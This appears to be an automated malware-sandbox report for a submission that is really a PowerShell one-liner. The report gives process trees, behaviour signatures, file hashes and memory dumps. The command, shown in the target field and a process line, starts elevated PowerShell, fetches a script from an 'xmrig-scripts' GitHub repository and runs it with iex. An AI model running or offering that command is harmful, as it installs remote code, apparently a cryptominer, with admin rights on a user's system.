Overview

overview

4

Static

static

1

URLScan

urlscan

http://start-process...

windows10-1703-x64

4

http://start-process...

windows10-2004-x64

3

Analysis

  • max time kernel
    1799s
  • max time network
    1713s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15/07/2024, 13:15

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Score
4/10
defense_evasionprivilege_escalation

Malware Config

Signatures

  • Drops file in Windows directory 4 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
    defense_evasionprivilege_escalation
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\LaunchWinApp.exe
    "C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
    1⤵
    • Access Token Manipulation: Create Process with Token
    PID:2648
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:216
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:2772
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3640
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:2204
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:2136
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4520
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc89c89758,0x7ffc89c89768,0x7ffc89c89778
      2⤵
        PID:4848
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1628 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:2
        2⤵
          PID:820
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:8
          2⤵
            PID:4280
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2060 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:8
            2⤵
              PID:2512
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2900 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:1
              2⤵
                PID:3688
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2908 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:1
                2⤵
                  PID:4172
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4464 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:1
                  2⤵
                    PID:4416
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:8
                    2⤵
                      PID:392
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:8
                      2⤵
                        PID:3900
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5076 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:8
                        2⤵
                          PID:512
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5344 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:1
                          2⤵
                            PID:312
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:8
                            2⤵
                              PID:2204
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5940 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:1
                              2⤵
                                PID:4168
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4432 --field-trial-handle=1796,i,8465134001604785186,7358336083759019989,131072 /prefetch:2
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4044
                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                              1⤵
                                PID:3676

                              Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
                                      Filesize

                                      240B

                                      MD5

                                      734591f84538ea7eb5dc56e20e81ff2e

                                      SHA1

                                      092ecfdd43052cd17a1ddda65386c533bca9d3d0

                                      SHA256

                                      5df312c35205e0af2a9916d7548f32f6ada64966c49db616fed29faccc99ce42

                                      SHA512

                                      8396cabddd7538b94c2e78aa20ade704f11be5cb3a908edaf977633bb8eda850efe7e48d2bf9e8f12f76493ec49303db577c8106bbeabaf11a718e063da10f78

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                      Filesize

                                      2KB

                                      MD5

                                      7c6ed6d3c29edad2ae368823ec346253

                                      SHA1

                                      ada17b78a577ce2ebe263fb6d85ccdbfad610a78

                                      SHA256

                                      1da735d0c727f51b38cc9c5731ea84e2d0ca178d17fa0b7823bca741bfb21a0b

                                      SHA512

                                      72f502a17ba17c8169c7d72f478a2307f3e2f87814c29725fa1b6e3160ee224a43baac5ed28f2fb0b2960f0e1f8ffad4f75d0e43f269ef39d712e5529195c1cb

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                      Filesize

                                      2KB

                                      MD5

                                      6dd135036fadbff149204e57c5260eac

                                      SHA1

                                      0bc5066b8ddc8a9de07529e84b9791deb8dad627

                                      SHA256

                                      b9a3f6a7a02109681c33914ec05932bbf8a8e73270eeda56a65d5b1141646b06

                                      SHA512

                                      13f1fa35f2341cc04d5bd9ebeb4d80075f1a71bf8d4fa79c6b4369cab455e9558b47a0f429d99aad5165a211e3e8c14c85e68e88d533c2384dd84136fd90b6b2

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                      Filesize

                                      2KB

                                      MD5

                                      b23bce10a42e67c97f4b849645184018

                                      SHA1

                                      54900d84e4c2c8726f33cc497edb775e34f64403

                                      SHA256

                                      4996a92b1a8c8e87bb7311eab53e4e9c256fe5ba2a942ebb24b0cd53ce90fec1

                                      SHA512

                                      9f289ce2f7cb067ccb453636d11f40933a53297d53141701d2da7db1f5621541eaa85bb95087df98b97fdcc44379296d15f815a9de267f235c140c12a4f51a52

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                      Filesize

                                      1KB

                                      MD5

                                      43ae41cfb8cab8714e10516d62b9f813

                                      SHA1

                                      ea2ab3a7a98bf90f57bd6cc947bae87dfba0b528

                                      SHA256

                                      e0ddb0771692b36976745fcfbe1b77dbf7dde279f517b5416867e92dcb7ca4cb

                                      SHA512

                                      3772eaef29696ded724252c825d26ee0c42263ce5c004b1451c5ef4acbf292ad60dc921a88ebef9a8405874e5bd935efb7c0533d76ac4ed5ad5b963bb58b2070

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                      Filesize

                                      371B

                                      MD5

                                      f3a16938acfd111f220c92d66a0a7a38

                                      SHA1

                                      86219dfaeac79fe25558837d1da9b914e24d92ab

                                      SHA256

                                      54dfaf4a1c2dddd1cf34beaca9dcfb220631ceadc8f0d9cc63099505b9dd7e2f

                                      SHA512

                                      53230a878f3319ab1965d620a9516d22d85cbf22c83d206808d35873387e2f7e316d1c9e7a3219df2a6cf7383cb146321000e0d3a90168e1c2ba6b9e40355e41

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                      Filesize

                                      5KB

                                      MD5

                                      a2db19ee456461443a74b8009a8ef490

                                      SHA1

                                      3a7ea13a9db9a1dc741ea9f677f9033cb6971226

                                      SHA256

                                      fcaaeddb62538d57a7a46bbd754778921b7a4e09d6921bfa56ceb65ac392a009

                                      SHA512

                                      1de13882fb1e69dcf8a0aceb5aa413801dd6070fc4eafdc7632581aefca96f4f5d034e02d6c93fc5ecefd9a2500004284f8c150a57f95e64ef3549c763a441f4

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      7b341002d4a443ebeaa4f624a5b7f83f

                                      SHA1

                                      8a3b81ea69aaaec6d28a4cb529cbefa2a7d0c577

                                      SHA256

                                      a75b99e2578683249545bd0f6fabafb4d96b2d50618a2cd02cf7f5633d170ca8

                                      SHA512

                                      ead6fc9e5f0b04efb5f62c332b66a3f1faac8542b7fb14dec4675f639d9d3ed4067fb755cbbca82d2a050ee197b17bba53eac7265affebc3a4165da23273e628

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      ca176e3dfbd4471dab2d1a0bf0d27436

                                      SHA1

                                      7a3f7a80b17874ca1859350360e2530cfc7aede9

                                      SHA256

                                      3807606306f855ebc9969b16a45fb62f32c937a7b1a017436074180daec4dfea

                                      SHA512

                                      02099a54658fb361930845c29f77c06c9ef42b874450643c078fa13b161f67fb270651f8dbb183fca3659c2e855b1cf2f4bfe3508ca8991e09e7deb5cdd40714

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                      Filesize

                                      12KB

                                      MD5

                                      34ca32ff552e61ba50ca0d68031e25d1

                                      SHA1

                                      274a94b2f839208b0a31fdcbdf8ff211dd742723

                                      SHA256

                                      cf6190518165270423edf666a1363a8c16fe85ef5e5d5471cf1ba5ed848ff67b

                                      SHA512

                                      1b8de6c1f8b8361725372c479b27b7deada1de94849bb5e82d6114a4e381be173ba6aa4980b99501a56d8a14982181ff36c11c3994eab239eef8e6838e27aeed

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                      Filesize

                                      288KB

                                      MD5

                                      f734441711d03c351929fc10cc76aaa5

                                      SHA1

                                      bc62f74bf7232ab30a7a02b3144fb2b5b55605ea

                                      SHA256

                                      0b74bd6715fcd84dd5d579cbab5a5744745bff92fae39a16cd8cfb4200ed228c

                                      SHA512

                                      1590f27db39341d6bbdb27a6999bf154bb1b4910c59772cececc671f0ccc6582bc348ee643856181b19cc9f008e3af8f752977167391b8607635f088fb4d8d21

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
                                      Filesize

                                      97KB

                                      MD5

                                      f75950bd4eacce0fa162d19a40ba8c12

                                      SHA1

                                      eb592faaac2f1ed042d01b92b0ee5fced96776dd

                                      SHA256

                                      25905f24a2b39405a3e7a2ee6a9ff1ca591ed6a458df565ac094e8d47569891e

                                      SHA512

                                      abaa7eda8db8da554f1fd670ebd6cdb48ca64887eec5390feadd8409c34f2d4913182fa8cff8da938e2f96622363a4b8e2ea7987c8a0aca3e34333a48572e905

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58530d.TMP
                                      Filesize

                                      92KB

                                      MD5

                                      e629994f2a1a1d13e68244a446261f57

                                      SHA1

                                      e6cd27e279e9f1e21961ae39bc0a4a876498cb1c

                                      SHA256

                                      c8cee6349fff436b15104aa0d8b44f914a0a047518f903637dcdf20a98f93961

                                      SHA512

                                      a68799e72714a7d46ca0ed22e7a5f0fb3c18eb5265f5f7a05f740dc46928868d57ea85db30cd5c6cc1dd952ee09f271b1ab3e53a3edc18c6c8e2891b5fd8aa22

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\d17c5c16-315c-4f8b-b448-4be00764d0ee.tmp
                                      Filesize

                                      2B

                                      MD5

                                      99914b932bd37a50b983c5e7c90ae93b

                                      SHA1

                                      bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                      SHA256

                                      44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                      SHA512

                                      27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DF1ECA43E08759F595.TMP
                                      Filesize

                                      16KB

                                      MD5

                                      641d1fc5532b4f20c1ca215b13f21e7a

                                      SHA1

                                      eddd8b3fe6d9534515d63e5196bc34e045dbba3c

                                      SHA256

                                      ac0bd0f3017cab721fdec9e2149764fc688b4cbb38def28290c1bf15120afea3

                                      SHA512

                                      24e96ad07acec063fd4219d7308458dd8249f665e8d49c8d88eeb1b3702e5be22ef8c37b1d3eab704ad23eaf059a92d9ee393aa91b7c9a38d5cd317e6351c74d

                                      Download Submit

                                    • memory/216-0-0x000001E490220000-0x000001E490230000-memory.dmp

                                      Filesize

                                      64KB

                                      Download

                                    • memory/216-91-0x000001E48F330000-0x000001E48F331000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/216-87-0x000001E494440000-0x000001E494441000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/216-84-0x000001E494580000-0x000001E494582000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/216-16-0x000001E490320000-0x000001E490330000-memory.dmp

                                      Filesize

                                      64KB

                                      Download

                                    • memory/216-35-0x000001E494D70000-0x000001E494D72000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/2136-65-0x000001CBF4E40000-0x000001CBF4E42000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/2136-58-0x000001CBE4400000-0x000001CBE4500000-memory.dmp

                                      Filesize

                                      1024KB

                                      Download

                                    • memory/2136-50-0x000001CBE3EA0000-0x000001CBE3EA2000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/2136-53-0x000001CBE3ED0000-0x000001CBE3ED2000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/2136-55-0x000001CBE3EF0000-0x000001CBE3EF2000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/2136-63-0x000001CBF4E20000-0x000001CBF4E22000-memory.dmp

                                      Filesize

                                      8KB

                                      Download

                                    • memory/2136-61-0x000001CBF4E00000-0x000001CBF4E02000-memory.dmp

                                      Filesize

                                      8KB

                                      Download